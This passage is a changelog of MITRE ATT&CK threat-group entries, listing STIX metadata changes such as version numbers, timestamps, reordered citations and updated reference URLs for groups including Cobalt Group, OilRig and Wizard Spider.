x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.0 → 3.1

[G0143] Aquatic Panda

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: New Value
aliases: ['Aquatic Panda']
values_changed
STIX Field: Old value → New Value
modified: 2022-06-29 20:28:29.913000+00:00 → 2023-03-21 21:16:34.243000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[G0114] Chimera

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2022-03-25 19:35:55.074000+00:00 → 2023-03-22 03:25:24.295000+00:00
external_references[2]['url']: https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf → https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf
x_mitre_version: 2.1 → 2.2

[G0080] Cobalt Group

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-18 22:02:12.586000+00:00 → 2023-03-22 03:28:29.415000+00:00
external_references[1]['source_name']: Cobalt Group → Cobalt Spider
external_references[1]['description']: (Citation: Talos Cobalt Group July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Citation: PTSecurity Cobalt Dec 2016) (Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 2018) → (Citation: Crowdstrike Global Threat Report Feb 2018)
external_references[4]['source_name']: Cobalt Spider → Cobalt Group
external_references[4]['description']: (Citation: Crowdstrike Global Threat Report Feb 2018) → (Citation: Talos Cobalt Group July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Citation: PTSecurity Cobalt Dec 2016) (Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 2018)
external_references[5]['source_name']: Talos Cobalt Group July 2018 → Crowdstrike Global Threat Report Feb 2018
external_references[5]['description']: Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018. → CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
external_references[5]['url']: https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html → https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report
external_references[6]['source_name']: PTSecurity Cobalt Group Aug 2017 → Secureworks GOLD KINGSWOOD September 2018
external_references[6]['description']: Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018. → CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.
external_references[6]['url']: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf → https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish
external_references[7]['source_name']: PTSecurity Cobalt Dec 2016 → Europol Cobalt Mar 2018
external_references[7]['description']: Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018. → Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.
external_references[7]['url']: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf → https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain
external_references[8]['source_name']: Group IB Cobalt Aug 2017 → Morphisec Cobalt Gang Oct 2018
external_references[8]['description']: Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018. → Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
external_references[8]['url']: https://www.group-ib.com/blog/cobalt → https://blog.morphisec.com/cobalt-gang-2.0
external_references[9]['source_name']: Proofpoint Cobalt June 2017 → RiskIQ Cobalt Nov 2017
external_references[9]['description']: Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018. → Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.
external_references[9]['url']: https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target → https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/
external_references[10]['source_name']: RiskIQ Cobalt Nov 2017 → RiskIQ Cobalt Jan 2018
external_references[10]['description']: Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018. → Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.
external_references[10]['url']: https://www.riskiq.com/blog/labs/cobalt-strike/ → https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/
external_references[11]['source_name']: RiskIQ Cobalt Jan 2018 → Group IB Cobalt Aug 2017
external_references[11]['description']: Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018. → Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
external_references[11]['url']: https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/ → https://www.group-ib.com/blog/cobalt
external_references[12]['source_name']: Europol Cobalt Mar 2018 → Proofpoint Cobalt June 2017
external_references[12]['description']: Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018. → Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.
external_references[12]['url']: https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain → https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target
external_references[13]['source_name']: Secureworks GOLD KINGSWOOD September 2018 → PTSecurity Cobalt Dec 2016
external_references[13]['description']: CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021. → Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
external_references[13]['url']: https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish → https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf
external_references[14]['source_name']: Crowdstrike Global Threat Report Feb 2018 → PTSecurity Cobalt Group Aug 2017
external_references[14]['description']: CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018. → Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
external_references[14]['url']: https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report → https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf
external_references[15]['source_name']: Morphisec Cobalt Gang Oct 2018 → Talos Cobalt Group July 2018
external_references[15]['description']: Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018. → Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
external_references[15]['url']: https://blog.morphisec.com/cobalt-gang-2.0 → https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
x_mitre_version: 2.0 → 2.1

[G1003] Ember Bear

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-14 15:03:19.292000+00:00 → 2023-03-22 03:40:53.311000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[G0037] FIN6

Current version: 3.3

Version changed from: 3.2 → 3.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-06-02 20:11:01.957000+00:00 → 2023-03-22 03:50:17.471000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.2 → 3.3

[G0046] FIN7

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-07-20 20:06:44.706000+00:00 → 2023-03-22 03:51:04.185000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.1 → 2.2

[G0061] FIN8

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-12 21:31:07.407000+00:00 → 2023-03-22 03:52:13.089000+00:00
external_references[2]['url']: https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html → https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
x_mitre_version: 1.2 → 1.3

[G0117] Fox Kitten

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-06-02 20:12:00.458000+00:00 → 2023-03-22 03:53:37.888000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[G0047] Gamaredon Group

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-15 13:46:34.474000+00:00 → 2023-03-22 04:29:39.915000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[G0125] HAFNIUM

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-07-06 20:05:26.079000+00:00 → 2023-04-10 21:54:46.756000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: Old value → New Value
x_mitre_contributors: Vinayak Wadhwa, SAFE Security

[G1001] HEXANE

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-08-31 22:16:30.454000+00:00 → 2023-03-22 04:43:59.082000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_domains[0]: ics-attack → enterprise-attack
x_mitre_domains[1]: enterprise-attack → ics-attack
x_mitre_version: 2.0 → 2.1

[G1004] LAPSUS$

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-12 12:21:38.612000+00:00 → 2023-04-11 00:01:29.232000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[G0032] Lazarus Group

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-08-23 15:30:44.196000+00:00 → 2023-03-30 19:01:41.451000+00:00
external_references[6]['url']: https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/ → https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.1 → 3.2

[G0140] LazyScripter

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-15 19:09:59.211000+00:00 → 2023-03-22 04:49:29.731000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.0 → 1.1

[G0077] Leafminer

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-12 23:23:16.109000+00:00 → 2023-03-22 04:50:51.782000+00:00
external_references[1]['source_name']: Leafminer → Raspite
external_references[1]['description']: (Citation: Symantec Leafminer July 2018) → (Citation: Dragos Raspite Aug 2018)
external_references[2]['source_name']: Raspite → Leafminer
external_references[2]['description']: (Citation: Dragos Raspite Aug 2018) → (Citation: Symantec Leafminer July 2018)
external_references[3]['source_name']: Symantec Leafminer July 2018 → Dragos Raspite Aug 2018
external_references[3]['description']: Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018. → Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.
external_references[3]['url']: https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east → https://www.dragos.com/blog/20180802Raspite.html
external_references[4]['source_name']: Dragos Raspite Aug 2018 → Symantec Leafminer July 2018
external_references[4]['description']: Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018. → Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.
external_references[4]['url']: https://www.dragos.com/blog/20180802Raspite.html → https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east
x_mitre_version: 2.3 → 2.4

[G0059] Magic Hound

Current version: 5.1

Version changed from: 5.0 → 5.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-06-03 13:20:02.945000+00:00 → 2023-01-13 21:18:18.077000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 5.0 → 5.1

[G0069] MuddyWater

Current version: 4.1

Version changed from: 4.0 → 4.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-17 12:43:55.847000+00:00 → 2023-03-22 04:59:16.032000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 4.0 → 4.1

[G0129] Mustang Panda

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-11 16:43:52.231000+00:00 → 2023-03-22 22:01:13.781000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[G0049] OilRig

Current version: 3.1

Version changed from: 3.0 → 3.1


Old Description
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

New Description
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

Details
dictionary_item_added
STIX Field: Old value → New Value
external_references: https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
dictionary_item_removed
STIX Field: Old value → New Value
external_references: https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_references: https://pan-unit42.github.io/playbook_viewer/
values_changed
STIX Field: Old value → New Value
modified: 2022-06-02 20:18:52.733000+00:00 → 2023-02-06 20:58:52.317000+00:00
description: [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) → [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
external_references[5]['source_name']: Check Point APT34 April 2021 → Evasive Serpens
external_references[5]['description']: Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. → (Citation: Unit42 OilRig Playbook 2023)
external_references[6]['source_name']: ClearSky OilRig Jan 2017 → Check Point APT34 April 2021
external_references[6]['description']: ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017. → Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
external_references[6]['url']: http://www.clearskysec.com/oilrig/ → https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_references[7]['source_name']: Palo Alto OilRig May 2016 → ClearSky OilRig Jan 2017
external_references[7]['description']: Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017. → ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
external_references[7]['url']: http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ → http://www.clearskysec.com/oilrig/
external_references[8]['source_name']: Palo Alto OilRig April 2017 → Palo Alto OilRig May 2016
external_references[8]['description']: Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017. → Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
external_references[8]['url']: http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ → http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
external_references[9]['source_name']: Palo Alto OilRig Oct 2016 → Palo Alto OilRig April 2017
external_references[9]['description']: Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017. → Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
external_references[9]['url']: http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/ → http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/
external_references[10]['source_name']: Unit 42 QUADAGENT July 2018 → Palo Alto OilRig Oct 2016
external_references[10]['description']: Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. → Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
external_references[10]['url']: https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ → http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
external_references[11]['source_name']: Crowdstrike Helix Kitten Nov 2018 → Unit 42 QUADAGENT July 2018
external_references[11]['description']: Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018. → Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
external_references[11]['url']: https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ → https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
external_references[12]['source_name']: FireEye APT34 Dec 2017 → Crowdstrike Helix Kitten Nov 2018
external_references[12]['description']: Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. → Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
external_references[12]['url']: https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html → https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
external_references[13]['source_name']: Secureworks COBALT GYPSY Threat Profile → FireEye APT34 Dec 2017
external_references[13]['description']: Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021. → Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
external_references[13]['url']: https://www.secureworks.com/research/threat-profiles/cobalt-gypsy → https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
external_references[14]['source_name']: APT34 → Secureworks COBALT GYPSY Threat Profile
external_references[14]['description']: This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021) → Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.
external_references[15]['source_name']: Unit 42 Playbook Dec 2017 → APT34
external_references[15]['description']: Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. → This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.0 → 3.1
iterable_item_added
STIX Field: Old value → New Value
aliases: Evasive Serpens
external_references: {'source_name': 'Unit 42 Playbook Dec 2017', 'description': 'Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.', 'url': 'https://pan-unit42.github.io/playbook_viewer/'}
external_references: {'source_name': 'Unit42 OilRig Playbook 2023', 'description': 'Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.', 'url': 'https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens'}

[G0040] Patchwork

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-09-02 18:04:32.246000+00:00 → 2023-03-22 05:08:20.780000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.4 → 1.5

[G0121] Sidewinder

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-04-21 12:32:46.791000+00:00 → 2023-03-22 05:31:54.382000+00:00
external_references[3]['source_name']: ATT Sidewinder January 2021 → Cyble Sidewinder September 2020
external_references[3]['description']: Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021. → Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.
external_references[3]['url']: https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf → https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/
external_references[5]['source_name']: Cyble Sidewinder September 2020 → ATT Sidewinder January 2021
external_references[5]['description']: Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021. → Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
external_references[5]['url']: https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/ → https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
x_mitre_version: 1.0 → 1.1

[G0091] Silence

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-06-02 20:13:56.605000+00:00 → 2023-03-22 05:34:46.346000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.1 → 2.2

[G0092] TA505

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-13 16:17:20.601000+00:00 → 2023-03-22 05:38:20.381000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[G0127] TA551

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-09-30 12:58:59.065000+00:00 → 2023-03-22 05:40:21.255000+00:00
external_references[3]['source_name']: Secureworks GOLD CABIN → Unit 42 Valak July 2020
external_references[3]['description']: Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021. → Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
external_references[3]['url']: https://www.secureworks.com/research/threat-profiles/gold-cabin → https://unit42.paloaltonetworks.com/valak-evolution/
external_references[5]['source_name']: Unit 42 Valak July 2020 → Secureworks GOLD CABIN
external_references[5]['description']: Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020. → Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.
external_references[5]['url']: https://unit42.paloaltonetworks.com/valak-evolution/ → https://www.secureworks.com/research/threat-profiles/gold-cabin
x_mitre_version: 1.1 → 1.2

[G0027] Threat Group-3390

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-11 18:05:20.983000+00:00 → 2023-03-29 16:53:17.235000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 2.0 → 2.1

[G0010] Turla

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-09-28 21:27:07.133000+00:00 → 2023-03-22 05:41:28.428000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 3.0 → 3.1

[G0102] Wizard Spider

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field: Old value → New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-14 17:27:41.194000+00:00 → 2023-03-22 05:44:27.289000+00:00
external_references[1]['source_name']: UNC1878 → Grim Spider
external_references[1]['description']: (Citation: FireEye KEGTAP SINGLEMALT October 2020) → (Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)
external_references[2]['source_name']: TEMP.MixMaster → UNC1878
external_references[2]['description']: (Citation: FireEye Ryuk and Trickbot January 2019) → (Citation: FireEye KEGTAP SINGLEMALT October 2020)
external_references[3]['source_name']: Grim Spider → TEMP.MixMaster
external_references[3]['description']: (Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019) → (Citation: FireEye Ryuk and Trickbot January 2019)
external_references[4]['source_name']: CrowdStrike Ryuk January 2019 → DHS/CISA Ransomware Targeting Healthcare October 2020
external_references[4]['description']: Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020. → DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.
external_references[4]['url']: https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/ → https://us-cert.cisa.gov/ncas/alerts/aa20-302a
external_references[5]['source_name']: DHS/CISA Ransomware Targeting Healthcare October 2020 → FireEye Ryuk and Trickbot January 2019
